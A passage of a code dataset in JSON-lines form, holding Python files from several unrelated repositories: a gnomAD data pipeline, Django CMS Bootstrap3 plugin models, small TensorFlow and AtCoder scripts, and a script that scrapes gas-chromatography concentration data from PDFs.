exist\")\n\n if self._inputs:\n output_mod_time = modified_time(output_path)\n input_mod_time = max(modified_time(path) for path in self.get_inputs().values())\n\n if input_mod_time > output_mod_time:\n return (True, \"Input is newer than output\")\n\n return (False, None)\n\n def run(self, force=False):\n output_path = self.get_output_path()\n should_run, reason = (True, \"Forced\") if force else self.should_run()\n if should_run:\n logger.info(f\"Running {self._name} ({reason})\")\n start = time.perf_counter()\n result = self._task_function(**self.get_inputs(), **self._params)\n\n if self._config:\n if \"gs://\" not in self._config.output_root:\n Path(self._config.output_root).mkdir(parents=True, exist_ok=True)\n\n result.write(output_path, overwrite=True) # pylint: disable=unexpected-keyword-arg\n stop = time.perf_counter()\n elapsed = stop - start\n logger.info(f\"Finished {self._name} in {elapsed // 60}m{elapsed % 60:02}s\")\n else:\n logger.info(f\"Skipping {self._name}\")\n\n\n@attr.define\nclass Pipeline:\n config: Optional[PipelineConfig] = None\n _tasks: OrderedDict = OrderedDict()\n _outputs: dict = {}\n\n def add_task(\n self,\n name: str,\n task_function: Callable,\n output_path: str,\n inputs: Optional[dict] = None,\n params: Optional[dict] = None,\n ):\n if inputs is None:\n inputs = {}\n if params is None:\n params = {}\n task = Task.create(self.config, name, task_function, output_path, inputs, params)\n self._tasks[name] = task\n return task\n\n def add_download_task(self, name, *args, **kwargs) -> DownloadTask:\n task = DownloadTask.create(self.config, name, *args, **kwargs)\n self._tasks[name] = task\n return task\n\n def get_task(self, name: str) -> Union[Task, DownloadTask]:\n try:\n return self._tasks[name]\n except KeyError as error:\n raise ValueError(f\"Pipeline contains no task named '{name}'\") from error\n\n def get_all_task_names(self) -> List[str]:\n return list(self._tasks.keys())\n\n def run(self, force_tasks=None) -> None:\n for task_name, task in self._tasks.items():\n task.run(force=force_tasks and task_name in force_tasks)\n\n def set_outputs(self, outputs) -> None:\n for output_name, task_name in outputs.items():\n assert task_name in self._tasks, f\"Unable to set output '{output_name}', no task named '{task_name}'\"\n\n self._outputs = outputs\n\n def get_output(self, output_name) -> Union[Task, DownloadTask]:\n task_name = self._outputs[output_name]\n return self._tasks[task_name]\n\n\n@attr.define\nclass PipelineMock:\n output_mappings: Dict[str, str]\n\n @classmethod\n def create(cls, output_mappings: Dict[str, str]):\n return cls(output_mappings)\n\n def get_output(self, output_name):\n if output_name in self.output_mappings:\n return self.output_mappings.get(output_name)\n raise ValueError(\"Output name is not valid\")\n\n\ndef run_pipeline(pipeline: Pipeline):\n task_names = pipeline.get_all_task_names()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--output-root\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"--force\", choices=task_names, nargs=\"+\")\n group.add_argument(\"--force-all\", action=\"store_true\")\n args = parser.parse_args()\n\n if args.output_root:\n _pipeline_config[\"output_root\"] = args.output_root.rstrip(\"/\")\n\n pipeline_args = {}\n if args.force_all:\n pipeline_args[\"force_tasks\"] = task_names\n elif args.force:\n pipeline_args[\"force_tasks\"] = args.force\n\n hl.init()\n\n pipeline.run(**pipeline_args)\n","repo_name":"broadinstitute/gnomad-browser","sub_path":"data-pipeline/src/data_pipeline/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":8984,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"63"} +{"seq_id":"16209599946","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nfrom functools import partial\nimport collections\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils.html import strip_tags\nfrom django.utils.translation import ugettext, ugettext_lazy as _, ungettext\n\nimport django.forms.models\n\nfrom cms.models.pluginmodel import CMSPlugin\nimport cms.models\nimport cms.models.fields\n\nfrom djangocms_attributes_field.fields import AttributesField\nimport djangocms_text_ckeditor.fields\nimport filer.fields.file\nimport filer.fields.image\nimport filer.fields.folder\n\nfrom . import model_fields, constants, utils\n\n\n##########\n# Mixins # do NOT use outside of this package!\n########## Because changes here might require Database migrations!\nimport os\n\n\nCMSPluginField = partial(\n models.OneToOneField,\n to=CMSPlugin,\n related_name='+',\n parent_link=True,\n)\n\n\nclass LinkMixin(models.Model):\n link_url = models.URLField(_(\"link\"), blank=True, default='')\n link_page = cms.models.fields.PageField(\n verbose_name=_(\"page\"),\n blank=True,\n null=True,\n on_delete=models.SET_NULL\n )\n link_file = filer.fields.file.FilerFileField(\n verbose_name=_(\"file\"),\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n link_anchor = models.CharField(\n _(\"anchor\"), max_length=128, blank=True,\n help_text=_(\"Adds this value as an anchor (#my-anchor) to the link.\"),\n )\n link_mailto = models.EmailField(\n _(\"mailto\"), blank=True, null=True, max_length=254\n )\n link_phone = models.CharField(\n _('Phone'), blank=True, null=True, max_length=40,\n )\n link_target = models.CharField(\n _(\"target\"), blank=True, max_length=100,\n choices=((\n (\"\", _(\"same window\")),\n (\"_blank\", _(\"new window\")),\n (\"_parent\", _(\"parent window\")),\n (\"_top\", _(\"topmost frame\")),\n ))\n )\n # Override this property in concrete classes as required.\n excluded_attr_keys = ['href', 'target', ]\n link_attributes = AttributesField(\n _('Link Attributes'), excluded_keys=excluded_attr_keys, blank=True)\n\n class Meta:\n abstract = True\n\n def get_link_url(self):\n if self.link_phone:\n link = u\"tel://{0}\".format(self.link_phone).replace(' ', '')\n elif self.link_mailto:\n link = u\"mailto:{0}\".format(self.link_mailto)\n elif self.link_url:\n link = self.link_url\n elif self.link_page_id:\n link = self.link_page.get_absolute_url()\n elif self.link_file:\n link = self.link_file.url\n else:\n link = \"\"\n if self.link_anchor:\n link += '#{0}'.format(self.link_anchor)\n return link\n\n\n#################\n# Basic Plugins #\n#################\n\n@python_2_unicode_compatible\nclass Boostrap3ButtonPlugin(CMSPlugin, LinkMixin):\n cmsplugin_ptr = CMSPluginField()\n excluded_attr_keys = ['class', 'href', 'target', ]\n\n label = models.CharField(\n _(\"label\"),\n max_length=256,\n blank=True,\n default='',\n )\n type = model_fields.LinkOrButton()\n\n # button specific fields\n btn_context = model_fields.Context(\n verbose_name='context',\n choices=constants.BUTTON_CONTEXT_CHOICES,\n default=constants.BUTTON_CONTEXT_DEFAULT,\n )\n btn_size = model_fields.Size(verbose_name='size')\n btn_block = models.BooleanField(default=False, verbose_name='block')\n # text link specific fields\n txt_context = model_fields.Context(\n verbose_name='context',\n choices=constants.TXT_LINK_CONTEXT_CHOICES,\n default=constants.TXT_LINK_CONTEXT_DEFAULT,\n blank=True,\n )\n # common fields\n icon_left = model_fields.Icon()\n icon_right = model_fields.Icon()\n\n classes = model_fields.Classes()\n responsive = model_fields.Responsive(\n blank=True,\n default='',\n )\n responsive_print = model_fields.ResponsivePrint(\n blank=True,\n default='',\n )\n\n def __str__(self):\n return self.label\n\n\n@python_2_unicode_compatible\nclass Boostrap3BlockquotePlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n reverse = models.BooleanField(default=False, blank=True)\n classes = model_fields.Classes()\n\n def __str__(self):\n return 'Blockquote: '\n\n\n@python_2_unicode_compatible\nclass Boostrap3IconPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n icon = model_fields.Icon(blank=False)\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.icon\n\n\n@python_2_unicode_compatible\nclass Boostrap3LabelPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n label = models.CharField(\n _(\"label\"),\n max_length=256,\n blank=True,\n default='',\n )\n context = model_fields.Context(\n choices=constants.LABEL_CONTEXT_CHOICES,\n default=constants.LABEL_CONTEXT_DEFAULT,\n blank=False,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.label\n\n\n@python_2_unicode_compatible\nclass Boostrap3WellPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n size = model_fields.Size()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\n@python_2_unicode_compatible\nclass Boostrap3AlertPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n context = model_fields.Context()\n icon = model_fields.Icon()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\ndef compute_aspect_ratio(image):\n if image.exif.get('Orientation', 1) > 4:\n # image is rotated by 90 degrees, while keeping width and height\n return float(image.width) / float(image.height)\n else:\n return float(image.height) / float(image.width)\n\n\n@python_2_unicode_compatible\nclass Boostrap3ImagePlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n file = filer.fields.image.FilerImageField(\n verbose_name=_(\"file\"),\n blank=False,\n null=True,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n alt = model_fields.MiniText(\n _(\"alt\"),\n blank=True,\n default='',\n )\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n )\n use_original_image = models.BooleanField(\n _(\"use original image\"),\n blank=True,\n default=False,\n help_text=_(\n \"use the original full-resolution image (no resizing).\"\n )\n )\n override_width = models.IntegerField(\n _(\"override width\"),\n blank=True,\n null=True,\n help_text=_(\n 'if this field is provided it will be used to scale image.'\n )\n )\n override_height = models.IntegerField(\n _(\"override height\"),\n blank=True,\n null=True,\n help_text=_(\n 'if this field is provided it will be used to scale image. '\n 'If aspect ration is selected - height will be calculated '\n 'based on that.'\n )\n )\n aspect_ratio = models.CharField(\n _(\"aspect ratio\"),\n max_length=10,\n blank=True,\n default='',\n choices=constants.ASPECT_RATIO_CHOICES\n )\n thumbnail = models.BooleanField(\n _(\"thumbnail\"),\n default=False,\n blank=True,\n help_text=\"add the 'thumbnail' border\",\n )\n shape = models.CharField(\n _('shape'),\n max_length=64,\n blank=True,\n default='',\n choices=(\n ('rounded', 'rounded'),\n ('circle', 'circle'),\n )\n )\n\n classes = model_fields.Classes()\n img_responsive = models.BooleanField(\n verbose_name='class: img-responsive',\n default=True,\n blank=True,\n help_text='whether to treat the image as using 100% width of the '\n 'parent container (sets the img-responsive class).'\n )\n\n def __str__(self):\n txt = 'Image'\n\n if self.file_id and self.file.label:\n txt = self.file.label\n return txt\n\n def srcset(self):\n if not self.file:\n return []\n items = collections.OrderedDict()\n if self.aspect_ratio:\n aspect_width, aspect_height = tuple([int(i) for i in self.aspect_ratio.split('x')])\n else:\n aspect_width, aspect_height = None, None\n for device in constants.DEVICES:\n if self.override_width:\n width = self.override_width\n else:\n # TODO: should this should be based on the containing col size?\n width = device['width_gutter']\n width_tag = str(width)\n if aspect_width is not None and aspect_height is not None:\n height = int(float(width)*float(aspect_height)/float(aspect_width))\n crop = True\n else:\n if self.override_height:\n height = self.override_height\n else:\n height = 0\n crop = False\n items[device['identifier']] = {\n 'size': (width, height),\n 'size_str': \"{}x{}\".format(width, height),\n 'width_str': \"{}w\".format(width),\n 'subject_location': self.file.subject_location,\n 'upscale': True,\n 'crop': crop,\n 'aspect_ratio': (aspect_width, aspect_height),\n 'width_tag': width_tag,\n }\n\n return items\n\n\n@python_2_unicode_compatible\nclass Boostrap3SpacerPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n size = model_fields.Size()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return 'size-' + self.size + ' ' + self.classes\n\n\n@python_2_unicode_compatible\nclass Bootstrap3FilePlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n file = filer.fields.file.FilerFileField(\n verbose_name=_(\"file\"),\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n name = model_fields.MiniText(\n _(\"name\"),\n blank=True,\n default='',\n )\n open_new_window = models.BooleanField(default=False)\n show_file_size = models.BooleanField(default=False)\n\n # common fields\n icon_left = model_fields.Icon()\n icon_right = model_fields.Icon()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n label = self.name\n if not label:\n if self.file_id:\n label = self.file.label\n else:\n label = 'File'\n return label\n\n\n#########\n# Panel #\n#########\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n context = model_fields.Context(\n choices=constants.PANEL_CONTEXT_CHOICES,\n default=constants.PANEL_CONTEXT_DEFAULT,\n blank=False,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.context\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelHeadingPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n help_text='Alternatively you can add plugins'\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.title\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelBodyPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\n@python_2_unicode_compatible\nclass Boostrap3PanelFooterPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.classes\n\n\n########\n# Grid #\n########\n\nColSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=1,\n max_value=constants.GRID_SIZE\n)\n\nOffsetSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=0,\n max_value=constants.GRID_SIZE\n)\n\nPushSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=0,\n max_value=constants.GRID_SIZE\n)\n\nPullSizeField = partial(\n model_fields.IntegerField,\n null=True,\n blank=True,\n default=None,\n min_value=0,\n max_value=constants.GRID_SIZE\n)\n\n\nclass Bootstrap3RowPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n classes = model_fields.Classes()\n\n def get_short_description(self):\n instance = self.get_plugin_instance()[0]\n\n if not instance:\n return ugettext(\"\")\n\n column_count = len(self.child_plugin_instances or [])\n column_count_str = ungettext(\n \"1 column\",\n \"%(count)i columns\",\n column_count\n ) % {'count': column_count}\n\n if self.classes:\n return \"{} ({})\".format(\n self.classes,\n column_count_str\n )\n return column_count_str\n\n\n@python_2_unicode_compatible\nclass Bootstrap3ColumnPlugin(CMSPlugin):\n DEVICE_CHOICES = constants.DEVICE_CHOICES\n DEVICE_SIZES = constants.DEVICE_SIZES\n\n cmsplugin_ptr = CMSPluginField()\n classes = model_fields.Classes()\n tag = models.SlugField(default='div')\n\n def __str__(self):\n txt = ' '.join([self.get_column_classes(), self.classes])\n if self.tag != 'div':\n txt = '{} ({})'.format(txt, self.tag)\n return txt\n\n def get_class(self, device, element):\n size = getattr(self, '{}_{}'.format(device, element), None)\n if size is not None:\n if element == 'col':\n return 'col-{}-{}'.format(device, size)\n else:\n return 'col-{}-{}-{}'.format(device, element, size)\n return ''\n\n def get_column_classes(self):\n classes = []\n for device in self.DEVICE_SIZES:\n for element in ('col', 'offset', 'push', 'pull'):\n classes.append(self.get_class(device, element))\n return ' '.join(cls for cls in classes if cls)\n\n\nfor size, name in constants.DEVICE_CHOICES:\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_col'.format(size),\n ColSizeField(verbose_name=_('col-{}-'.format(size))),\n )\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_offset'.format(size),\n OffsetSizeField(verbose_name=_('offset-'.format(size))),\n )\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_push'.format(size),\n PushSizeField(verbose_name=_('push-'.format(size))),\n )\n Bootstrap3ColumnPlugin.add_to_class(\n '{}_pull'.format(size),\n PullSizeField(verbose_name=_('pull-'.format(size))),\n )\n\n\n\n#############\n# Accordion #\n#############\n\nclass Bootstrap3AccordionPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n index = models.PositiveIntegerField(\n _('index'), null=True, blank=True,\n help_text=_('index of element that should be opened on page load '\n '(leave it empty if none of the items should be opened)'))\n classes = model_fields.Classes()\n\n def get_short_description(self):\n instance = self.get_plugin_instance()[0]\n\n if not instance:\n return ugettext(\"\")\n\n column_count = len(self.child_plugin_instances or [])\n column_count_str = ungettext(\n \"1 item\",\n \"%(count)i items\",\n column_count\n ) % {'count': column_count}\n return column_count_str\n\n\n@python_2_unicode_compatible\nclass Bootstrap3AccordionItemPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n )\n context = model_fields.Context(\n choices=constants.ACCORDION_ITEM_CONTEXT_CHOICES,\n default=constants.ACCORDION_ITEM_CONTEXT_DEFAULT,\n blank=False,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.title\n\n\n#############\n# ListGroup #\n#############\n\nclass Bootstrap3ListGroupPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n classes = model_fields.Classes()\n add_list_group_class = models.BooleanField(\n verbose_name='class: list-group',\n default=True,\n blank=True,\n help_text='whether to add the list-group and list-group-item classes'\n )\n\n def get_short_description(self):\n instance = self.get_plugin_instance()[0]\n\n if not instance:\n return ugettext(\"\")\n\n column_count = len(self.child_plugin_instances or [])\n column_count_str = ungettext(\n \"1 item\",\n \"%(count)i items\",\n column_count\n ) % {'count': column_count}\n return column_count_str\n\n\n@python_2_unicode_compatible\nclass Bootstrap3ListGroupItemPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n title = model_fields.MiniText(\n _(\"title\"),\n blank=True,\n default='',\n )\n context = model_fields.Context(\n choices=constants.LIST_GROUP_ITEM_CONTEXT_CHOICES,\n default=constants.LIST_GROUP_ITEM_CONTEXT_DEFAULT,\n blank=True,\n )\n state = models.CharField(\n verbose_name='state',\n choices=(\n ('active', 'active'),\n ('disabled', 'disabled'),\n ),\n max_length=255,\n blank=True,\n )\n\n classes = model_fields.Classes()\n\n def __str__(self):\n return self.title\n\n\n############\n# Carousel # derived from https://github.com/aldryn/aldryn-gallery/tree/0.2.6\n############\n\n@python_2_unicode_compatible\nclass Bootstrap3CarouselPlugin(CMSPlugin):\n STYLE_DEFAULT = 'standard'\n\n STYLE_CHOICES = [\n (STYLE_DEFAULT, _('Standard')),\n ]\n\n TRANSITION_EFFECT_CHOICES = (\n ('slide', _('Slide')),\n )\n\n cmsplugin_ptr = CMSPluginField()\n style = models.CharField(\n _('Style'),\n choices=STYLE_CHOICES + utils.get_additional_styles(),\n default=STYLE_DEFAULT,\n max_length=50,\n )\n aspect_ratio = models.CharField(\n _(\"aspect ratio\"),\n max_length=10,\n blank=True,\n default='',\n choices=constants.ASPECT_RATIO_CHOICES\n )\n transition_effect = models.CharField(\n _('Transition Effect'),\n choices=TRANSITION_EFFECT_CHOICES,\n default='',\n max_length=50,\n blank=True,\n )\n ride = models.BooleanField(\n _('Ride'),\n default=True,\n help_text=_('Whether to mark the carousel as animating '\n 'starting at page load.'),\n )\n interval = models.IntegerField(\n _('Interval'),\n default=5000,\n help_text=_(\"The amount of time to delay between automatically \"\n \"cycling an item.\"),\n )\n wrap = models.BooleanField(\n default=True,\n blank=True,\n help_text=_('Whether the carousel should cycle continuously or '\n 'have hard stops.')\n )\n pause = models.BooleanField(\n default=True,\n blank=True,\n help_text=_('Pauses the cycling of the carousel on mouseenter and '\n 'resumes the cycling of the carousel on mouseleave.')\n )\n classes = model_fields.Classes()\n\n def __str__(self):\n data = django.forms.models.model_to_dict(self)\n data.update(dict(\n style_label=_('Style'),\n transition_effect_label=_('Transition Effect'),\n ride_label=_('Ride'),\n interval_label=_('Interval'),\n aspect_ratio_label=_('Aspect Ratio'),\n ))\n fields = [\n 'style',\n 'transition_effect',\n 'ride',\n 'interval',\n 'aspect_ratio',\n ]\n if not data['ride']:\n fields.remove('interval')\n return ', '.join([\n '{key}: {value}'.format(\n key=data['{}_label'.format(field)],\n value=data[field]\n ) for field in fields\n ])\n\n def srcset(self):\n # more or less copied from image plugin.\n # TODO: replace with generic sizes/srcset solution\n items = collections.OrderedDict()\n if self.aspect_ratio:\n aspect_width, aspect_height = tuple([int(i) for i in self.aspect_ratio.split('x')])\n else:\n aspect_width, aspect_height = None, None\n for device in constants.DEVICES:\n width = device['width_gutter'] # TODO: should this should be based on the containing col size?\n width_tag = str(width)\n if aspect_width is not None and aspect_height is not None:\n height = int(float(width)*float(aspect_height)/float(aspect_width))\n crop = True\n else:\n height = 0\n crop = False\n items[device['identifier']] = {\n 'size': (width, height),\n 'size_str': \"{}x{}\".format(width, height),\n 'width_str': \"{}w\".format(width),\n # 'subject_location': self.file.subject_location,\n 'upscale': True,\n 'crop': crop,\n 'aspect_ratio': (aspect_width, aspect_height),\n 'width_tag': width_tag,\n }\n\n return items\n\n@python_2_unicode_compatible\nclass Bootstrap3CarouselSlidePlugin(CMSPlugin, LinkMixin):\n excluded_attr_keys = ['class', 'href', 'target', ]\n cmsplugin_ptr = CMSPluginField()\n image = filer.fields.image.FilerImageField(\n verbose_name=_('image'),\n blank=False,\n null=True,\n related_name='+',\n on_delete=models.SET_NULL,\n )\n link_text = models.CharField(\n verbose_name=_('link text'),\n max_length=200,\n blank=True\n )\n content = djangocms_text_ckeditor.fields.HTMLField(\n _(\"Content\"),\n blank=True,\n default='',\n help_text=_('alternatively add sub plugins as content'),\n )\n classes = model_fields.Classes()\n\n def __str__(self):\n image_text = content_text = ''\n\n if self.image_id:\n if self.image.name:\n image_text = self.image.name\n elif self.image.original_filename \\\n and os.path.split(self.image.original_filename)[1]:\n image_text = os.path.split(self.image.original_filename)[1]\n else:\n image_text = 'Image'\n if self.content:\n text = strip_tags(self.content).strip()\n if len(text) > 100:\n content_text = '{}...'.format(text[:100])\n else:\n content_text = '{}'.format(text)\n\n if image_text and content_text:\n return '{} ({})'.format(image_text, content_text)\n else:\n return image_text or content_text\n\n\n@python_2_unicode_compatible\nclass Bootstrap3CarouselSlideFolderPlugin(CMSPlugin):\n cmsplugin_ptr = CMSPluginField()\n folder = filer.fields.folder.FilerFolderField(\n verbose_name=_('folder'),\n )\n classes = model_fields.Classes()\n\n def __str__(self):\n if self.folder_id:\n return self.folder.pretty_logical_path\n else:\n return _('not selected yet')\n","repo_name":"TrellixVulnTeam/kessbiotech_N8EW","sub_path":"kess/Lib/site-packages/aldryn_bootstrap3/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":23412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71243849800","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 11:33:22 2019\n\n@author: zhuyangze\n\"\"\"\n\nimport tensorflow as tf\n\n# 定义常量\na = tf.constant(3)\nb = tf.constant(4)\n\n# 建立session\nwith tf.Session() as sess:\n print(\"相加: %i\" % sess.run(a + b))\n print(\"相乘: %i\" % sess.run(a * b))","repo_name":"LingChenBill/tensorflow_combat","sub_path":"4-2 with-session.py","file_name":"4-2 with-session.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27682361172","text":"import json\n\nwith open(\"roj_dan_tekmovalcev.json\", \"r+\") as jsonDat:\n podatki = json.load(jsonDat)\n\n for podatek in podatki:\n datum = podatek[\"datum\"]\n dan = datum[:2]\n mesec = datum[3:5]\n leto = datum[-4:]\n podatek[\"datum\"] = leto + \"-\" + mesec + \"-\" + dan\n\n jsonDat.seek(0)\n json.dump(podatki, jsonDat)\n jsonDat.truncate()\n","repo_name":"SashaOslaj/ZimskeOI","sub_path":"preoblikuj_datume.py","file_name":"preoblikuj_datume.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25280852987","text":"#!/usr/bin/env python3\n\ndef main():\n S = input()[:-1]\n while S:\n if len(S) % 2 == 0 and S[:len(S)//2] == S[len(S)//2:]:\n print(len(S))\n return\n S = S[:-1]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmiyakawa/atcoder-workspace","sub_path":"abc066/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6521669926","text":"from math import isnan\nimport glob\nimport xlsxwriter\nimport os\nimport re\nimport tabula\nimport pandas as pd\nimport tkinter\nimport tkinter.filedialog\nfrom pdfminer import high_level\nimport PySimpleGUI as sg\nimport traceback\n\nfrom utils import linear_regression\n \n\n\n# retrieve all pdfs in given folder\ndef get_PDFs(folder):\n PDFs = glob.glob(folder + \"/*.pdf\")\n return PDFs\n\n\n# turn user inputted sample name regex into python re regex\ndef process_regex(naming_regex):\n naming_regex = naming_regex.lower()\n regex = naming_regex.replace('s', '\\\\D+') # 's' for strings\n regex = regex.replace('d', '\\\\d+(?:\\\\.\\\\d+)?') # 'd' for numbers\n regex = regex.replace('x', '.+') # 'x' for either\n regex = regex.replace('-', '[\\\\s_-]+') # '-' for delimiter\n return regex, naming_regex.count('(') # for columns\n\n\n# universalize dates\ndef process_date(date):\n\n date_regex = r\"([a-zA-Z]+)[\\s-]?(\\d+)[,sth]*[\\s-]?(\\d{2,4})?\" # date regex for 'Sample ID' column\n\n # dictionary for matching inputted months with standard format\n months = {'jan' : 'January', 'january' : 'January',\n 'feb': 'February', 'february': 'February',\n 'mar': 'March', 'march': 'March',\n 'apr' : 'April', 'april': 'April',\n 'may': 'May',\n 'jun': 'June', 'june': 'June',\n 'jul': 'July', 'july': 'July',\n 'aug': 'August', 'august': 'August',\n 'sep': 'September', 'sept': 'September', 'september': 'September',\n 'oct': 'October', 'october': 'October',\n 'nov': 'November', 'november': 'November',\n 'dec': 'December', 'december': 'December'}\n\n match = re.search(date_regex, str(date))\n\n # if can't match with month just return what was passed\n if match:\n if str(match[1]).lower() in months:\n month = months[match[1].lower()]\n day = match[2]\n year = match[3]\n return month + \" \" + day + (\", \" + year if year else \", 2021\")\n else:\n return date\n else:\n if isinstance(date, float):\n if isnan(date):\n return 'empty'\n else:\n return str(date)\n\n\n# scrape GC data from each PDF in the given folder\ndef process_PDFs(samples, standards, sample_rows, PDFs, window, regex, count):\n counter = 0 # counter for pysimpleGUI progress bar\n longest_file_name = 0 # longest file name for excel output\n standard_regex = r\"(\\d*)\\s?ppm\" # regex for identifying standards\n concentration_regex = r\"-?\\d*\\.\\d*\" # regex for pulling raw numbers\n dates = [] # all dates with data\n\n for file in PDFs:\n\n # for whatever reason there are two different orders for the gas tables \n # if methane table is labeled 'Methane' vs 'CH4' correspond to a different overall order\n order_check_re = r\"Methane\"\n order_check = high_level.extract_text(file, '', 0)\n order_check_match = re.search(order_check_re, order_check)\n\n if order_check_match:\n order = {0: 0, 1: 1, 2: 2, 3: 3, 4: 4}\n else:\n order = {0: 0, 1: 2, 2: 3, 3: 1, 4: 4}\n\n if len(file) > longest_file_name:\n longest_file_name = len(file)\n\n if window:\n # generate progress bar\n event, values = window.read(timeout=10)\n window['-PROG-'].update(counter + 1)\n counter += 1\n if file == 'merged.pdf':\n continue\n\n print(\"Processing: \" + file)\n\n # get tables from pdf merge all gas concentration tables split between pages\n tables = tabula.read_pdf(file, pages = 'all')\n methane = tables[0]\n methane = methane.reset_index()\n num_samples = len(tables[0].index)\n processed_tables = []\n processed_tables.append(tables[0])\n\n merged = [0]\n for i in range(len(tables)):\n if i not in merged:\n temp_table = tables[i]\n while len(temp_table.index) != num_samples:\n k = i + 1\n temp_table = pd.concat([temp_table, tables[k]])\n merged.append(k)\n processed_tables.append(temp_table)\n\n\n # go through each table and pull the samples concentration for that gas, building a dictionary\n gasses = ['Methane', 'Carbon Dioxide', 'Oxygen', 'Nitrogen', 'Nitrous Oxide']\n\n for i in range(len(processed_tables)):\n processed_tables[i] = processed_tables[i].reset_index()\n print(processed_tables[i])\n for index, row in processed_tables[i].iterrows():\n if re.search(standard_regex, row['Sample Name']): # if standard\n standard = row['Sample Name'].replace(\" \", \"\")\n standards[standard][gasses[order[i]]].append(float(re.search(concentration_regex, row['Conc. Unit'])[0]))\n if gasses[i] == 'Methane':\n standards[standard]['File'].append(file)\n else: # else if sample\n date = process_date(row['Sample ID']) # process the date\n if date.lower() != 'blank':\n if date not in dates:\n dates.append(date)\n if date not in samples:\n samples[date] = {}\n\n # builds sample dictionary by working down for each column until the final layer for storing gas conc.\n current_sample = samples[date]\n sample_name = re.search(regex, row['Sample Name'])\n if sample_name:\n for j in range(count):\n if sample_name[j + 1] in current_sample:\n current_sample = current_sample[sample_name[j + 1]]\n else:\n if j + 1 == count:\n current_sample[sample_name[j + 1]] = ['', '', '', '', '', '']\n current_sample = current_sample[sample_name[j + 1]]\n else:\n current_sample[sample_name[j + 1]] = {}\n current_sample = current_sample[sample_name[j + 1]]\n \n current_sample[order[i]] = float(re.search(concentration_regex, row['Conc. Unit'])[0])\n current_sample[5] = file\n\n return samples, standards, sample_rows, longest_file_name, dates\n\n\n# calculate flux for each sample, recursively navigate down to the bottom layer for time and calculate flux\ndef flux_helper(val, count, current):\n if current > count:\n for k, v in val.items():\n flux_helper(v, count, current + 1)\n else:\n for k, v in val.items():\n v[\"RoC (ppm/min)\"] = []\n v[\"R2\"] = []\n for i in range(0, 5):\n X = []\n Y = []\n for time in v:\n if time == \"RoC (ppm/min)\" or time == \"R2\":\n continue\n \n X.append(float(time))\n Y.append(float(v[time][i]))\n\n try:\n m, b, R2 = linear_regression(X, Y)\n v[\"RoC (ppm/min)\"].append(round(m, 3)) \n v[\"R2\"].append(round(R2, 3))\n except:\n v[\"RoC (ppm/min)\"].append('')\n v[\"R2\"].append('')\n\n\n# initiate recursive flux calculation\ndef flux(something, count):\n for k, v in something.items():\n flux_helper(v, count - 1, 0)\n\n\n# flatten sample dictionary into list of lists for excel reporting\ndef 